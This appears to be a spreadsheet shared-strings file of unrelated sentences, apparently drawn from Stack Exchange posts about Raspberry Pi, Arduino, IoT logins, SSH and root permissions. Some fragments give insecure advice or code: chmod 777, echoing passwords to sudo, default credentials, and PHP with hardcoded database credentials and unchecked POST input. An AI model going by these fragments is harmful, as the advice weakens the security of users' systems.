  <si>
    <t>Free software implementing virtual private networks (VPN).</t>
  </si>
  <si>
    <t>The getpass module provides a portable way to handle such password prompts securely.</t>
  </si>
  <si>
    <t>This would make the code more generic so the user wouldn't have to know an IP address before connecting to the bot.</t>
  </si>
  <si>
    <t>The device is able to connect for a fraction of a second, but then error pops up in client device saying incorrect pin.</t>
  </si>
  <si>
    <t>This will ask the user for the password in a normal window, no terminal involved.</t>
  </si>
  <si>
    <t>The HMAC support implements the basics for message authentication, following RFC 2104.</t>
  </si>
  <si>
    <t>A web application will display the live status of certain variables in the status database, and people should be able to login to the web application (but that doesn't need to be achieved now, giving anyone on the local network access to it for now is fine).</t>
  </si>
  <si>
    <t>I believe there is a security measure that prevents everybody but localhost to run mysql commands.</t>
  </si>
  <si>
    <t>First we need to allow you to login automatically, so sudo nano /etc/inittab to open the inittab for editing.</t>
  </si>
  <si>
    <t>I suspect you wanted Fwd there:
if (Fwd &amp;&amp; (distanceL &gt; distanceR))
None of that explains why the car doesn't actually stop though.</t>
  </si>
  <si>
    <t>You may not need a connection to the internet to use license.</t>
  </si>
  <si>
    <t>The new Firebase Authentication service is covered by the firebase-authentication tag.</t>
  </si>
  <si>
    <t>It is JSON Web Token implementation in Python.</t>
  </si>
  <si>
    <t>Is this some known bug in the SD library or is there some sneaky way around this?</t>
  </si>
  <si>
    <t>I'm trying to get an arduino to login in to a website that I have created.</t>
  </si>
  <si>
    <t>Alas, now the response is the login page (to be expected).</t>
  </si>
  <si>
    <t>When I boot the Raspberry Pi up, it showed:
I was surprised that it showed the subdomain and domain on login (I'm a Linux newbie).</t>
  </si>
  <si>
    <t>When I installed it, it came up with an error, something like "pycrypto didn't install".</t>
  </si>
  <si>
    <t>I want to make my raspberry pi (reaspbian) available from the internet via ssh.</t>
  </si>
  <si>
    <t>How would i get that data in a safe way ?</t>
  </si>
  <si>
    <t>Do I need to register these profiles, or UIDs anywhere (e.g.</t>
  </si>
  <si>
    <t>If I kill the terminal I can ssh into raspberry again showing it did not shut down.</t>
  </si>
  <si>
    <t>So I am making a basic "security" system using a PIR sensor and a keypad to disarm and arm.</t>
  </si>
  <si>
    <t>Have I missed something with the user privileges?</t>
  </si>
  <si>
    <t>This webpage is protected by Basic Authentification.</t>
  </si>
  <si>
    <t>I have looked all over the internet and tried multiple different codes, but none have worked.</t>
  </si>
  <si>
    <t>But now, i need to put facebook login on this page.</t>
  </si>
  <si>
    <t>If so, how else can this SharedAccess key be working, is there a history or other keys I'm not remembering?</t>
  </si>
  <si>
    <t>They probably compiled some codes from the internet.</t>
  </si>
  <si>
    <t>Mobile user can see data from specific IoT device only, based on his login.</t>
  </si>
  <si>
    <t>the problem is once I insert the ADS library inside the surveillance code I get an error.</t>
  </si>
  <si>
    <t>Trying to use Bluetoothctl to pair, connect and trust the HC-05 device seems to fail for me.</t>
  </si>
  <si>
    <t>When I attempt to install, I get this error:
There is no proxy.</t>
  </si>
  <si>
    <t>I tested the FirebaseUI Auth library, with the same results.</t>
  </si>
  <si>
    <t>However, i cant find anything regarding authentication anywhere.</t>
  </si>
  <si>
    <t>This means I am not very experienced with C# and/or the security mechanisms applied.</t>
  </si>
  <si>
    <t>I/SELinux: SELinux:
  seapp_context_lookup: seinfo=untrusted, level=s0:c512,c768,
  pkgname=io.cordova.hellocordova  2019-02-07 19:03:46.044 18008-18008/?</t>
  </si>
  <si>
    <t>However, if I ssh into my device from a computer that is connected to the internet, I am able to use curl in the ssh session.</t>
  </si>
  <si>
    <t>I have found this official API to register the device .</t>
  </si>
  <si>
    <t>I'm using a Wroom-02 in station mode to exchange some information with my server (I'm using the SecureClient library).</t>
  </si>
  <si>
    <t>will still be create with root as the owner and group, and you'll need to use sudo to change them.</t>
  </si>
  <si>
    <t>Clearly you might need to concern yourself with a rogue server impersonating your nodejs server, and therefore might need to add some security (e.g.</t>
  </si>
  <si>
    <t>NFC Tag as authentication tool</t>
  </si>
  <si>
    <t>if so, does the user running the code enough privileges to open it or even see it?</t>
  </si>
  <si>
    <t>Just remember to sudo chmod 777 myScript.py, otherwise it fails saying that you don't have the right permissions.</t>
  </si>
  <si>
    <t>Alternatively, you can refactor your Python script to use pigpio's pigpiod daemon, which runs with superuser privileges (so your application doesn't have to).</t>
  </si>
  <si>
    <t>Use guards in headers instead.</t>
  </si>
  <si>
    <t>So you're safe using PyGObject for your program.</t>
  </si>
  <si>
    <t>Here is described an implementation of the [CHAP] (en.wikipedia.org/wiki/Challenge-Handshake_Authentication_Protocol) for Arduino/AVR devices.</t>
  </si>
  <si>
    <t>For dealing with unix permissions you may find this qa useful</t>
  </si>
  <si>
    <t>You can not make any web server "unaccessible" within a network.</t>
  </si>
  <si>
    <t>In general it's risky and can cause corruption.</t>
  </si>
  <si>
    <t>I don't think this is possible, out of the box, for security questions.</t>
  </si>
  <si>
    <t>Your program doesn't need root access.</t>
  </si>
  <si>
    <t>Most likely you don't need root access, but an adjustment of permissions on the device nodes you're trying to access, etc.</t>
  </si>
  <si>
    <t>But letting PHP anywhere near root is always tricky.</t>
  </si>
  <si>
    <t>Therefore, I'd check  /etc/profile.dand most importantly ~/.bash_login.</t>
  </si>
  <si>
    <t>Make sure that the Apache user has access to Phusion passenger.</t>
  </si>
  <si>
    <t>they are trying to find vulnerability in your server.</t>
  </si>
  <si>
    <t>Do remember to save the "devicename" and "devicekey" in your RPi3 so you can communicate with the device.</t>
  </si>
  <si>
    <t>2nd choice: Proxy Server
If you cant modify the server, you can run your own proxy.</t>
  </si>
  <si>
    <t>The web server user won't have permission to access that part of the system.</t>
  </si>
  <si>
    <t>For security reasons, you should not post your API Key publicly.</t>
  </si>
  <si>
    <t>This is the standard way to see who is logged in.</t>
  </si>
  <si>
    <t>It was the primary key of the Device itself, found in the Device Explorer.</t>
  </si>
  <si>
    <t>The only safe way to do this is to have a  that lets you access your internal network.</t>
  </si>
  <si>
    <t>(Note that China Azure didnt use CyberTrust Root CA.</t>
  </si>
  <si>
    <t>To do that you'll need to know the fingerprint of the certificate the web server uses.</t>
  </si>
  <si>
    <t>See the LoRaMacPayloadEncrypt() function for more details.</t>
  </si>
  <si>
    <t>So I think I have to add basic authentication to my webservice.</t>
  </si>
  <si>
    <t>You can use reverse ssh tunneling.</t>
  </si>
  <si>
    <t>In there you will find the trusted certificates.</t>
  </si>
  <si>
    <t>Queues are both thread and process safe.</t>
  </si>
  <si>
    <t>If you really want to automate it but you don't wanna run it as root... you'll need to use that_other_guys's answer but also echo your password as shown here.</t>
  </si>
  <si>
    <t>This is a tag for Intel VTune Amplifier XE profiling tool questions.</t>
  </si>
  <si>
    <t>The sealed modifier keyword prevents a C# class from being inherited.</t>
  </si>
  <si>
    <t>Barcode4j is a library to create barcodes with Java.</t>
  </si>
  <si>
    <t>NotORM is a PHP library for data access based on PDO.</t>
  </si>
  <si>
    <t>This saves the user keystrokes and helps standardize data.</t>
  </si>
  <si>
    <t>Such programs could contain malicious code, which would otherwise harm the user's system.</t>
  </si>
  <si>
    <t>The Symfony security component is a standalone library that can be used outside of Symfony2 projects.</t>
  </si>
  <si>
    <t>This includes their SAML and NAPPS toolkits, their Cloud Directory API, or their implementation of System for Cross-domain Identity Management (SCIM).</t>
  </si>
  <si>
    <t>A JavaScript library for anonymous browser fingerprinting</t>
  </si>
  <si>
    <t>Ivory is a Haskell DSL to generate safer C code.</t>
  </si>
  <si>
    <t>Questions about the Data Loss Prevention API from Google Cloud Platform</t>
  </si>
  <si>
    <t>Such programs could contain malicious code, which would harm the user's system.</t>
  </si>
  <si>
    <t>Xanitizer is a security analysis tool for web applications.</t>
  </si>
  <si>
    <t>Some of the most common causes are:
The user tried to change an Oracle username or password without having the appropriate privileges.</t>
  </si>
  <si>
    <t>See: Do you use the TR 24731 'safe' functions?</t>
  </si>
  <si>
    <t>It can be use to validate the data on the users browser i.e.</t>
  </si>
  <si>
    <t>This saves the user keystrokes and helps standardize data
Try out a demonstration.</t>
  </si>
  <si>
    <t>This library helps you add Facebook Login and Graph API support to your app development in java.</t>
  </si>
  <si>
    <t>When you want two (or more) different proxies in chain; like:
You may need it when the only way out from your LAN is through proxy server.</t>
  </si>
  <si>
    <t>Usability:
Run any program through proxy server.</t>
  </si>
  <si>
    <t>Deobfuscation can come up in reverse-engineering.</t>
  </si>
  <si>
    <t>Links
Home page
HXT on Hackage</t>
  </si>
  <si>
    <t>The  element is used to select user information.</t>
  </si>
  <si>
    <t>For the most part, any other error will be translated into an IllegalArguementException.</t>
  </si>
  <si>
    <t>It can also be used in a lockless and GC-free manner.</t>
  </si>
  <si>
    <t>One of the modes John can use is the dictionary attack.</t>
  </si>
  <si>
    <t>Computer attack with rainbowtable.</t>
  </si>
  <si>
    <t>Request information about your site's crawl-errors.</t>
  </si>
  <si>
    <t>Suave is a lightweight, non-blocking web server.</t>
  </si>
  <si>
    <t>Creates DOS device mappings (e.g.</t>
  </si>
  <si>
    <t>This demonstrates vsftpd is a mature and trusted solution.</t>
  </si>
  <si>
    <t>Fingerprintjs is a JavaScript library for anonymous browser fingerprinting.</t>
  </si>
  <si>
    <t>Fingerprintjs2 is a JavaScript library for anonymous browser fingerprinting.</t>
  </si>
  <si>
    <t>Note: For Microsoft Access questions, use ms-access instead.</t>
  </si>
  <si>
    <t>For more information check FakeXrmEasy website</t>
  </si>
  <si>
    <t>There's also a Ethereum StackExchange site that's dedicated to Bitcoin.</t>
  </si>
  <si>
    <t>It's the first implementation of a decentralized DNS system on top of the Bitcoin blockchain.</t>
  </si>
  <si>
    <t>j2html is a Java library for building HTML in a type-safe manner.</t>
  </si>
  <si>
    <t>More information about Cabal can be found at the Cabal website.</t>
  </si>
  <si>
    <t>Keys are more formally known as candidate keys or minimal superkeys.</t>
  </si>
  <si>
    <t>If that doesn't work then you're probably not going bypass the server's cache.</t>
  </si>
  <si>
    <t>You need to invoke 
Here is a nice article explaining when/why/where: RPi.GPIO basics 3  How to Exit GPIO programs cleanly, avoid warnings and protect your Pi.</t>
  </si>
  <si>
    <t>You can subsitute  for org.jboss.as.messaging, org.jboss.as.security, org.jboss.as.logging, org.jboss.as.connector... etc.</t>
  </si>
  <si>
    <t>How can:
1) I get rid of the username/password prompt when the raspberry Pi launches?</t>
  </si>
  <si>
    <t>I am logged in as the basic user= pi , password = raspberry.</t>
  </si>
  <si>
    <t>I enabled SSH the SSH server on the Pi on the configuration / Interfaces</t>
  </si>
  <si>
    <t>I am able to log in.</t>
  </si>
  <si>
    <t>Which is logged in the Init() Method.</t>
  </si>
  <si>
    <t>Is it ROOT or is it the USER ID you've logged into.</t>
  </si>
  <si>
    <t>With the access token the application could ask for user details.</t>
  </si>
  <si>
    <t>it could use basic authentication).</t>
  </si>
  <si>
    <t>proxyquire - rewiremock is a better proxyquire, with the same interface.</t>
  </si>
  <si>
    <t>Can someone explain to me how to decrypt a XBEE S1 packet ?</t>
  </si>
  <si>
    <t>But /dev/mem is only accessible to root.</t>
  </si>
  <si>
    <t>(Just to be clear, the daemon does have to run as root.</t>
  </si>
  <si>
    <t>Do you know other fingerprint python library that works with GT-521F32/52?</t>
  </si>
  <si>
    <t>--Connect_Ssh
  --ChilkatLog
Can someone explain to me why Im getting these error?</t>
  </si>
  <si>
    <t>or, there is a way to change this file programatically without having root access?</t>
  </si>
  <si>
    <t>and then try again, or try logout from ubuntu and login as root user.</t>
  </si>
  <si>
    <t>You need a root access.</t>
  </si>
  <si>
    <t>GPIO access through sysfs has been deprecated since Linux 4.8.</t>
  </si>
  <si>
    <t>MembershipReboot is a user identity management and authentication library.</t>
  </si>
  <si>
    <t>Furthermore I'm lurking around in the Charcoal chatroom to help take down spam.</t>
  </si>
  <si>
    <t>The other way to gain reputation is by suggesting edits to existing posts as a new registered user.</t>
  </si>
  <si>
    <t>PostgreSQL's write-ahead log is a crucial feature that permits crash-safety and atomic commit to be implemented.</t>
  </si>
  <si>
    <t>If you need this extra information (and it sounds like you do), you'd need to run nmap (or the Python script that calls it) with super-user privileges.</t>
  </si>
  <si>
    <t>Which one it validates is selected according to an algorithm called PRA (Purported Responsible Address, RFC 4407).</t>
  </si>
  <si>
    <t>The cookielib module of Python 2 defines classes for automatic handling of HTTP cookies.</t>
  </si>
  <si>
    <t>Due security considerations I don't want to publish the server directly to the internet.</t>
  </si>
  <si>
    <t>NOTE: If you have problems authorizing multiple accounts, open a new window in your browser in incognito/private-browsing mode and repeat the t authorize steps.</t>
  </si>
  <si>
    <t>If I first boot up the Pi, with 4g dongle, and then connect the Pi with computer, its getting connected to the 4g dongle's internet, but not getting detected in putty.</t>
  </si>
  <si>
    <t>sudo is used to allow super-user (root) access for regular user accounts.</t>
  </si>
  <si>
    <t>Passport strategy for authenticating with Facebook using the OAuth 2.0 API.</t>
  </si>
  <si>
    <t>Technology
In order for a server to use the LTPA authentication mechanism, it must first be configured to do so.</t>
  </si>
  <si>
    <t>SimpleWebRTC normalizes browser API differences for peer connections and user media access.</t>
  </si>
  <si>
    <t>Keyrock is responsible for authentication and authorization processes, together with PEP Proxy.</t>
  </si>
  <si>
    <t>runas is a Windows command which allows a user to run a specific program under the credentials of another user.</t>
  </si>
  <si>
    <t>All of the header files have include guards.</t>
  </si>
  <si>
    <t>The usual access specifiers are , protected and public.</t>
  </si>
  <si>
    <t>Security bulletin related to git 2.2.0 flaw on case insensitive file systems.</t>
  </si>
  <si>
    <t>https://www.docker.com/products/docker-trusted-registry</t>
  </si>
  <si>
    <t>This is not malicious, it's a technical challenge!</t>
  </si>
  <si>
    <t>Not sure about this, I think I need to make my raspberry pi ssh from public internet, i.e.</t>
  </si>
  <si>
    <t>My question is, why isn't my verification able to compile?</t>
  </si>
  <si>
    <t>I tried this link to check my script's permissions and it seems to be okay?</t>
  </si>
  <si>
    <t>Of course this needs to be scripted on a raspberry pi 2 so the login is without user interaction at boot.</t>
  </si>
  <si>
    <t>Am I forgetting to give permissions to a specific file?</t>
  </si>
  <si>
    <t>So my question: Is it illegal to have an input with no id or name?</t>
  </si>
  <si>
    <t>I tried editing arduinos but it fails on install, I think the security file has something to do with that.</t>
  </si>
  <si>
    <t>That's why I took the liberty ask the question, as the solution they give to everyone is that on permissions.</t>
  </si>
  <si>
    <t>Is there a way to boot like in windows safe mode?</t>
  </si>
  <si>
    <t>I really don't like this approach as it just feels too hacky for me.</t>
  </si>
  <si>
    <t>I am using device explorer tool to generate SAS token.</t>
  </si>
  <si>
    <t>Is there a way of checking whether a PFX file will be trusted by Windows and if not, why not?</t>
  </si>
  <si>
    <t>If your site handles the login otherwise, then you can use this for the rest.</t>
  </si>
  <si>
    <t>you can get rid of them with GNU sed: , but first copy it somewhere safe in case that doesn't work.</t>
  </si>
  <si>
    <t>You have to think about what exact attacks you want to protect against.</t>
  </si>
  <si>
    <t>I've taken a stab at it, though no promises that it will be bug free.</t>
  </si>
  <si>
    <t>More information about
  these certificates can be found on Digicert's website.</t>
  </si>
  <si>
    <t>For your case, I think a safe option is buy a shield that do that for you.</t>
  </si>
  <si>
    <t>A mechanism for you to provide your own certificate chain currently does not exist.</t>
  </si>
  <si>
    <t>MS Security Essentials is Microsoft's free anti-virus offering.</t>
  </si>
  <si>
    <t>Flask-OIDC is an extension to Flask that allows you to add OpenID Connect based authentication to your website.</t>
  </si>
  <si>
    <t>I have no privileges to edit it or create a synonym.</t>
  </si>
  <si>
    <t>When a tag or other NFC device is scanned, and an AAR is discoverd, Android tries to start the particular application.</t>
  </si>
  <si>
    <t>If I connect raspberry pi with monitor and keyboard, I'll be able to log in.</t>
  </si>
  <si>
    <t>I upload the code with my network details.</t>
  </si>
  <si>
    <t>Arduino code for NodeMCU:
PHP code:
&lt;?php
$servername = 172.168.2.143;
$username = esp8266;
$password = Tutorial;
$dbname = esp8266;
$temp = $_POST[temp];
$conn = mysql_connect(172.168.2.143,esp8266,Tutorial);
if(!$conn) {
  die(Could not connect:  .</t>
  </si>
  <si>
    <t>I adapted it to the doIdentification function of the Candy Dispenser Android App.</t>
  </si>
  <si>
    <t>On your laptop:
(username is the Pi username)
This will connect to the Pi via the webserver.</t>
  </si>
  <si>
    <t>Try using HIDAPI, a cross-platform library for accessing Human Interface Devices.</t>
  </si>
  <si>
    <t xml:space="preserve">
so I'm not sure if this is preview 1 or 2
 is the fingerprint for Preview 1, so you're still on it.</t>
  </si>
  <si>
    <t>Guardian is a token based authentication library for use with Elixir applications.</t>
  </si>
  <si>
    <t>I already saved key codes with LIRC library.</t>
  </si>
  <si>
    <t>Literally just launched SSH on my Rasberry Pi and have no idea what it means.</t>
  </si>
  <si>
    <t>Do you know how i can automaticly launch a VNC or SSH server without having to plug a TV and keyboard ?</t>
  </si>
  <si>
    <t>This because you are bypassing the protection from its board.</t>
  </si>
  <si>
    <t>My 4.3 device is not rooted.</t>
  </si>
  <si>
    <t>On some raspberry devices, I have an eth0 network interface and on other raspberry I have an ethernet interface which name is enXXXX.</t>
  </si>
  <si>
    <t>Root Certificate PEM File - ???</t>
  </si>
  <si>
    <t>I tried to use autostart lxde but that did not work
Bashrc briefly worked I wish it could work without having to log in.</t>
  </si>
  <si>
    <t>And I can't use "mosquitto" command after logged into Amazon Linux AMI.</t>
  </si>
  <si>
    <t>Don't run your application as root.</t>
  </si>
  <si>
    <t>is OpenSSL's crypto library.</t>
  </si>
  <si>
    <t>The password for MySQL's root is used for mysql -u root -p.
There should be no need for sudo mysql ....</t>
  </si>
  <si>
    <t>The docker user (should be the logged in user, e.g.</t>
  </si>
  <si>
    <t>As strictly an API, NetBIOS is not a networking protocol.</t>
  </si>
  <si>
    <t>Examples of this are with Twitter homepage or Facebook homepage when you are logged in.</t>
  </si>
  <si>
    <t>It also serves as an edge-of-network security gateway.</t>
  </si>
  <si>
    <t>You can also change the SSH port to run on a non-standard port and that will obscure things slightly, though it will not change the theoretical vulnerabilities.</t>
  </si>
  <si>
    <t>You don't want to have a public API responsible for JIT device registration accessible by the whole Internet.</t>
  </si>
  <si>
    <t>Am an active reviewer for Smokey in Charcoal - a room for detecting spam across the Stack Exchange network.</t>
  </si>
  <si>
    <t>Only a few hundred of accounts registered and used simultaneously, for typical user chat (not bots)...?</t>
  </si>
  <si>
    <t>It rides on top of TCP which provides a reliable link between two computers (if packet get lost - it is re-transmitted).</t>
  </si>
  <si>
    <t>There's also some value about being cloud agnostic and using standard protocols / libraries like MQTT/Paho to avoid (aws) vendor lock-in.</t>
  </si>
  <si>
    <t>There are many people who will tell you they have much longer serial links but how reliable they are you'll never know.</t>
  </si>
  <si>
    <t>Specifically for URL-safe base64 encoding.</t>
  </si>
  <si>
    <t>The device will also likely be in a locked enclosure preventing anyone from reaching any of the physical buttons.</t>
  </si>
  <si>
    <t>Is there any chance that it could just be some sort of interference at my home location?</t>
  </si>
  <si>
    <t>Users can choose to limit ad tracking by turning off this setting on their devices.</t>
  </si>
  <si>
    <t>Sanctuary makes it possible to write safe code without null checks.</t>
  </si>
  <si>
    <t>It also criminalizes the act of circumventing an access control, whether or not there is actual infringement of copyright itself.</t>
  </si>
  <si>
    <t>So add your user to the gpio group and hey presto, you're good to run without root.</t>
  </si>
  <si>
    <t>It uses the currently subjectively "best of its breed" components such as Genshi/Kid (Templating), SQLAlchemy (Database ORM), Pylon (WSGI Stack) and repoze (Auth) and unites them with as little "glue code" as possible for a quick start off.</t>
  </si>
  <si>
    <t>To edit the files owned by root, you need super user do(sudo) privilege.</t>
  </si>
  <si>
    <t>NEM is a peer-to-peer cryptocurrency and blockchain platform launched on March 31, 2015.</t>
  </si>
  <si>
    <t>Why are strlcpy and strlcat considered insecure?</t>
  </si>
  <si>
    <t>I am trying to implement user name and password from web Server application with Arduino board.</t>
  </si>
  <si>
    <t>Here is some logs : 
It seems that I am not allowed to login as root.</t>
  </si>
  <si>
    <t>I want to enroll my device with COPE ownership.</t>
  </si>
  <si>
    <t>I'll post the codes and photos below.</t>
  </si>
  <si>
    <t>I am using a sandbox key through ably.</t>
  </si>
  <si>
    <t>Therefore I implemented in the way like the iothub_ll_client_x509_sample.</t>
  </si>
  <si>
    <t>With the version before I used SSH to acess the raspberrypi 3.</t>
  </si>
  <si>
    <t>These need to be done as the root user.</t>
  </si>
  <si>
    <t>Shadow side is also responsible for storing sensor data such an event sourcing mechanism.</t>
  </si>
  <si>
    <t>Note: 
My SD card slot (the locking mechanism) in PI is broken so I have some tape to handle it in place.</t>
  </si>
  <si>
    <t>The primary risk is to ensure secure provisioning to prevent insertion of undesired certificates.</t>
  </si>
  <si>
    <t>As Android derives from the Linux kernel, rooting an Android device is similar to accessing administrative permissions on Linux or any other Unix-like operating system such as FreeBSD or OS X.</t>
  </si>
  <si>
    <t>For example, if the source had an error and generated input without the expected terminator; or was malicious.</t>
  </si>
  <si>
    <t>NOTE: It is a very bad idea to give general sudo access to a web server.</t>
  </si>
  <si>
    <t>You need to include a Basic Authorisation header which has your API keys (mine are Standard Application):</t>
  </si>
  <si>
    <t>Maybe this could be something but wouldn't apache have logged som access error in that case?</t>
  </si>
  <si>
    <t>Since the implementation creates Address (and Terminal) objects, it is responsible for insuring the correctness of these relationships.</t>
  </si>
  <si>
    <t>I log in using docker log in and I still get the error.</t>
  </si>
  <si>
    <t>You may need NodeDiscover to implement hashCode() if it does not already.</t>
  </si>
  <si>
    <t>You could also do this as a stateless service that is a background worker (not a web api) that has 32 instances.</t>
  </si>
  <si>
    <t>OAuth 2.0 is the second version of the OAuth protocol.</t>
  </si>
  <si>
    <t>Control over the SSH encryption key and protocol version.</t>
  </si>
  <si>
    <t>XBee Series 1 modules are 802.15.4 only, and don't implement the ZigBee protocol.</t>
  </si>
  <si>
    <t>Shadow side is also responsible for
  storing sensor data such an event sourcing mechanism.</t>
  </si>
  <si>
    <t>pidCrypt is a JavaScript cryptographic library implementing RSA, AES, SHA2, etc</t>
  </si>
  <si>
    <t>Documentation: Using Pageant for authentication.</t>
  </si>
  <si>
    <t>I am trying to implement OP-TEE trust OS on Raspberry Pi 3, with a Raspbian OS.</t>
  </si>
  <si>
    <t>I did all the steps while in a Python virtual environment, so defined:
I execute these commands:
echo "deb https://dl.google.com/aiyprojects/deb stable main" | sudo tee /etc/apt/sources.list.d/aiyprojects.list
wget -q -O - https://dl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo apt-get update
sudo apt-get upgrade
sudo reboot
sudo apt-get install dkms
sudo apt install raspberrypi-kernel-headers
sudo reboot
sudo apt-get install -y aiy-vision-dkms
At this point the build fails:
Below is /var/lib/dkms/aiy/1.1/build/make.log :
DKMS make.log for aiy-1.1 for kernel 3.6-trunk-rpi (armv7l)
Wed 30 Jan 22:03:20 CET 2019
make: Entering directory '/usr/src/linux-headers-3.6-trunk-rpi'
  LD      /var/lib/dkms/aiy/1.1/build/aiy/mfd/built-in.o
  LD      /var/lib/dkms/aiy/1.1/build/aiy/gpio/built-in.o
  LD      /var/lib/dkms/aiy/1.1/build/aiy/pwm/built-in.o
  CC [M]  /var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.o
  CC [M]  /var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.o
  LD      /var/lib/dkms/aiy/1.1/build/aiy/iio/adc/built-in.o
  CC [M]  /var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.o
  CC [M]  /var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.o
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:157:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:157:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:158:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:158:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:159:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:159:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:160:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:160:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:163:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:163:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:164:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:164:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:165:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:165:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:166:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:166:2: error: unknown field info_mask_separate specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c: In function aiy_adc_probe:
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:176:2: error: implicit declaration of function devm_iio_device_alloc [-Werror=implicit-function-declaration]
/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.c:176:10: warning: assignment makes pointer from integer without a cast [enabled by default]
cc1: some warnings being treated as errors
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:313: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.o' failed
make[6]: *** [/var/lib/dkms/aiy/1.1/build/aiy/iio/adc/aiy-adc.o] Error 1
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:443: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy/iio/adc' failed
make[5]: *** [/var/lib/dkms/aiy/1.1/build/aiy/iio/adc] Error 2
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:443: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy/iio' failed
make[4]: *** [/var/lib/dkms/aiy/1.1/build/aiy/iio] Error 2
make[4]: *** Waiting for unfinished jobs....
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:27:18: error: field chip has incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function to_aiy:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:58:28: warning: initialization from incompatible pointer type [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:58:28: warning: (near initialization for aiy_pwm) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_calculate_8bit_settings:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:80:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c: In function to_aiy:
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:46:9: error: implicit declaration of function gpiochip_get_data [-Werror=implicit-function-declaration]
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:46:27: warning: initialization makes pointer from integer without a cast [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:89:16: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c: In function aiy_gpio_request:
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:55:2: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:58:15: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c: In function aiy_gpio_free:
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:67:2: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:71:15: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:75:15: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c: In function aiy_io_mcu_write_direct:
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:86:2: error: implicit declaration of function __i2c_transfer [-Werror=implicit-function-declaration]
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c: In function aiy_gpio_direction_input:
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:83:2: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c: In function aiy_io_mcu_wait_alive:
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:98:3: error: implicit declaration of function msleep [-Werror=implicit-function-declaration]
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:87:15: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c: In function aiy_gpio_get:
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:100:2: error: struct gpio_chip has no member named parent
